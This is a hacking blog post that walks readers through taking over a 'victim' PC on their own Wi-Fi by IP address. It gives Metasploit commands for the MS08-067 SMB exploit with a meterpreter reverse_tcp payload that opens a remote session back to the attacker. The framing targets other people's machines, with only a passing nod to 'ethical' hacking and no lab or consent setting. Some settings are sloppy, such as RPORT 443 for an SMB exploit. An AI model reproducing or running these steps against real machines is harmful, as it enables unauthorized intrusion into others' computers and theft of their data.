How to hack a PC | On your LAN | Using IP Address
INTRO...
Welcome to the world of hacking . Blog of Hacking , Kali Hackerz . So here is my new post to teach you more about hacking . I have already told you many things on Hacking . So now I am sure that you are on the right path to become an ethical hacker , certified not illegal . Remember that in my earlier post I told you about the importance of finding out IP of any person , and I also taught you how to do that . So now when you have becomed professional in finding out the IP address of anyone now you will be thinking that what is the use of this . So in today's post I am going to tell you about the use of finding out IP address of anyone . Today I am going to teach you how to hack any remote pc which is connected to your wlan , using the ip address of that person . So lets begin..
HACKING BEGINS...
So now when you have find out the IP address of some one and you want o hack that person , so you can use Kali linux for this thing . It is not required to use only kali linux , just because I am using it . Basically platform does not matter the only thing matter is the skills you have .Amount of potential you have is the only thing that matters , if you are using "cmd" in windows and other one is using is using kali linux terminal then it is not necessary that he is more professional hacker than you , skills are the only thing that makes you more professional weather you are using kali linux or windows...
In my first post I told you about How to hack remote PC using kali linux..By use of Virus..(Part I) . Today I am using IP address as my weapon...
So I am using Kali linux and the thing which I am going to use is Metasploit . So if you are using kali linux then you are with me . Just follow my steps .
(Step I)Open up Kali Linux
If you are using kali linux then just open it up weather you are running it directly installed in yor computer or running it from a usb . It doesn't matter just open...
Download Kali Linux....!!!!!
Download Kali Linux....!!!!!
(Step II)Run Terminal
Second step is to run a terminal window in your kali linux . Terminal is a command window from where you can give commands to your operating system , just like "cmd" in windows , only thing different is that in windows there are not high level commands whereas in linux you can give high level commands .
After opening terminal you just have to write some commands to hack your victim...
Remember this method will only work when your victim is connected to your wlan that is to your wifi ....So make it sure...
(Step III)Run metasploit
So after you have opened up terminal , now you have to give some commands to make your hacking successful . The first thing you have to open is to run a "metasploit" in your command window . You can do this by writing the following commands in your terminal....
"msfconsole"
You can download "metaspoit" for windows from here Metasploit for WINDOWS...!!!!
After you have written this command , a new window will open this will take some time to open metasploit so be patient . After it has opened up it will show metasploit written which makes sure that it has opened up properly . Now your real hacking process begins....
(Step IV)Commands
So after metasploit has opened up you have to write the following commands . ..
"use windows/smb/ms08_067_netapi "
"set PAYLOAD windows/meterpreter/reverse_tcp "
Now you have yo give your IP address and victim's IP address....
To find out your IP address , open up new terminal and type " ifconfig" you will get your IP there..
Write...
"set LHOST (your ip) "
"set LPORT 4444 " This is your local port where you will recieve information from victim..
"set RHOST (victim's IP )"
You can learn finding out IP address by clicking here Click Here...!!!!
"set RPORT 443"
Now everything is done , your almost full hacking process is done , the only thing you have to do is to start the exploit . ...you can do this by typing....
"exploit"
Now you have started the exploit....and if your all the codes are correct then you will be able to connect to the victim's PC....
You can make it sure by seeing that it is showing "meterpreter session I opened" means you are connected...

You can type "help " for the list of commands which will help to you to hack different things...
Comments
Post a Comment